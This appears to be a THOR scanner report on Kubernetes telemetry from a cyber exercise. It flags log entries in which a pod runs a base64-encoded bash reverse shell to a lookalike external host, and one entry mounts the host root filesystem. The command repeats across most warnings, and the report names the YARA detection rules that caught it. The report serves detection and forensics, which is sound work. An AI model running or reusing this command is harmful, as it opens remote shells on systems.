THOR Scan Report

Scan Information
Scanner Thor
Version 10.7.9
Run on System WIN-LRTT94FA08M
Argument list --path D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024 --module filescan
Signature Database 2023/09/24-052825
Start Time Tue Sep 10 18:37:26 2024
End Time Tue Sep 10 18:47:10 2024
IP Addresses 10.100.5.12
Run as user WIN-LRTT94FA08M\Administrator
Admin rights yes
Platform Windows Server 2019 Standard
Log File Name WIN-LRTT94FA08M_thor_2024-09-10_1836.txt
False Positive Filters Applied 0
Scan ID S-SuOJqXNEdu8
Modules
LogScan 15
Statistics
Alerts 0
Warnings 12
Notice 6
Info 121
Errors 0
Errors
Alerts
Warnings
Warning 1
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
Warning 2
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
Warning 3
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"AoI_uJEBNKI3r7qcaSwz","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:21.961Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"191ab5a2-2575-4009-a93f-b458ac958b3e\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...],\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 4
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"34I_uJEBNKI3r7qckC81","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:35.965Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"e19bb517-20b7-4c99-8e9f-3daa35b7a341\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{\".\":{},\"f:mountPath\":{},\"f:name\":{}}}}},\
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 5
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"U4I_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3\", \"pid\":166517, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.426919025Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"tid\":166517}, \"pa[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]/fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":166480,"cwd":"/home/utils","start_t
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 6
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"VoI_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"pid\":166480, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.425980113Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2\", \"tid\":166480}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2N[...]4.118.57"]},"tags":["beats_input_codec_plain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:48.425980320Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":166480,"cwd":"/home/utils","start_time":"2024-09-03T14:17:48.425980113Z","docker":"fdcd66e90be354011d42578ba2f1fd0","parent_exec_id":"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2","tid":166480,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","c
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 7
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"wYI_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2\", \"pid\":166516, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.428681947Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGU[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bin/base64","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 
'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 8
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"y4I_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:49.971Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"1a825c2c-71a2-45df-a947-32d1c33d6f9f\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"$setEleme[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]th\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"calico\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\"
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 9
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"x4I_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"pid\":164760, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.402209123Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"tid\":164760}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"pid\":164746, \"uid\":0, \"cwd\"[...]ain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:20.402208808Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 